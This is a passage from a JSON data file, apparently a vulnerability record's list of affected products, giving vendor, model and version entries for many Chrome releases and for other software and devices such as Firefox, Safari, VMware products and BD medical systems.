"version": "10.3.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.777.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "3" }, { "model": "pyxis scrubstation system", "scope": "eq", "trust": 0.3, "vendor": "bd", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.26" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "18.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.63" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.51" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.21" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1312.20" }, { "model": "pyxis anesthesia system", "scope": "eq", "trust": 0.3, "vendor": "bd", "version": "35000" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "17.0.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.436.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.76" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1084.21" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1030.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.44" }, { "model": "xeon cpu e5-1650", "scope": "eq", "trust": 0.3, "vendor": "intel", "version": "v30" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.340" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "37.0.2062.45" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1689.2" }, { "model": "enterprise linux server aus", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "-7.4" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.85" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.81" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.889.2" }, { "model": "safari", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "10.1.2" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "5.0.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.343" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.531.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.89" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.679.0" }, { "model": "veritor plus system", "scope": "eq", "trust": 0.3, "vendor": "bd", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1312.38" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.20" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.103" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.57" }, { "model": "safari", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "4.1.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.300" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.893.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.56" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.5" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.644.0" }, { "model": "safari", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "7.0.2" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "0.5" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.173" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1312.70" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.43" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.570.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.17" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.4" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.536.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.81" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1084.52" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.37" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.9" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.313.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.34" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.30" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "2.0.172.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.351.0" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "7" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "26.0.1410.45" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.31" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.10" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.887.0" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "30.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.23" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1288.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.36" }, { "model": "content analysis", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "2.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1498.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.793.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1084.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.71" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.151" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1301.0" }, { "model": "facsvia", "scope": "eq", "trust": 0.3, "vendor": "bd", "version": "0" }, { "model": "pixel c", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.19" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.34" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.205" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.13" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.29" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.8" }, { "model": "vcenter server", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "6.5" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1043.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1000.0" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "46.0.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.19" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "0.7" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.317" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.204" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.5" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.342.9" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.909.0" }, { "model": "safari", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "6.0.3" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.118" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.13" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.886.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.17" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.17" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1312.14" }, { "model": "simatic ipc477e", "scope": "eq", "trust": 0.3, "vendor": "siemens", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.318" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.25" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.96" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.115" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.27" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.936.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.60" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.38" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.488.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.52" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.526.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.19" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.56" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.63" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.808.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.0.287.0" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.11.6" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "28.0.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.584.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.33" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1042.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.12" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "2.0.172.33" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.103" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.0.302.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.369.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.907.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.120" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "25.0.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1312.29" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.86" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.71" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1685.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.108" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.25" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "29.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.52" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.81" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.823.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.791.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "34.0.1847.8" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.577.0" }, { "model": "safari", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "9.0.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "44.0.2403.89" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1061.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.91" }, { "model": "simatic ipc347e", "scope": "eq", "trust": 0.3, "vendor": "siemens", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.676.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1084.10" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.7" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.8" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.210" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.525.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "35.0.1916.49" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.90" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.490.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.52" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.681.0" }, { "model": "viper lt", "scope": "eq", "trust": 0.3, "vendor": "bd", "version": "0" }, { "model": "pyxis procedurestation", "scope": "eq", "trust": 0.3, "vendor": "bd", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "35.0.1916.10" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.495.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.44" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.500.0" }, { "model": "vsphere data protection", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "6.0.7" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.309" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "37.0.2062.97" }, { "model": "enterprise linux server aus", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "-7.3" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "26.0.1410.42" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.214" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.1050" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.135" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.11" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "9.3.4" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "safari", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "2.0.4419.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.416.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.950.0" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "3.6.8" }, { "model": "sql server for x64-based systems service pack", "scope": "eq", "trust": 0.3, "vendor": "microsoft", "version": "200840" }, { "model": "vrealize automation", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "7.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.78" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.613.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.36" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.517.32" }, { "model": "safari", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "2.0.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "3.0.182.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1276.0" }, { "model": "fusion", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "8.5.4" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.163" }, { "model": "safari", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "1.2.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "31.0.1650.16" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.418.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1281.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1049.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.33" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.26" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.304" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "35.0.1916.45" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.162" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.18" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "3.6.11" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.305" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.862.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.464.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "37.0.2062.70" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.682.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.35" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.15" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.940.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "29.0.1547.5" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.22" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.119" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1683.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.151" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "3.6.16" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "34.0.1847.48" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.376.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.50" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.88" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1077.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.38" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.1025" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.921.3" }, { "model": "safari", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.17" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.10" }, { "model": "workstation", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "12.5.5" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.54" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "3.5.19" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.155" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.538.0" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "26.0.1410.9" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.519.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1041.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.69" }, { "model": "safari", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "9.0.1" }, { "model": "windows version for x64-based systems", "scope": "eq", "trust": 0.3, "vendor": "microsoft", "version": "1017030" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.912.40" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.874.14" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.45" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.561.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.5" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1306.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1311.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.586.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.928.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.93" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.517.5" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.766.0" }, { "model": "simatic ipc677c", "scope": "eq", "trust": 0.3, "vendor": "siemens", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "30.0.1599.23" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.28" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.28" }, { "model": "safari", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "1.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.34" }, { "model": "vcloud usage meter", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "3.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.43" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.740.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.125" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.50" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.14" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.50" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "9.0.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.603.0" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "1.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.45" }, { "model": "safari", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "4.0.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.14" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "40.0.2214.85" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.529.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.95" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "4.0.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.66" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.31" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.912.75" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.399.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.203" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.126" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.830.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.131" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.687.1" }, { "model": "chrome beta", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.0.249.78" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.335.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "35.0.1916.84" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "31.0.1650.46" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.925.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.16" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.64" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.499.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "30.0.1599.7" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.864.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.69" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.44" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.13" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.76" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "38.0.2125.101" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.40" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "3.6.7" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.39" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1312.18" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.447.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.43" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "3.5.7" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": 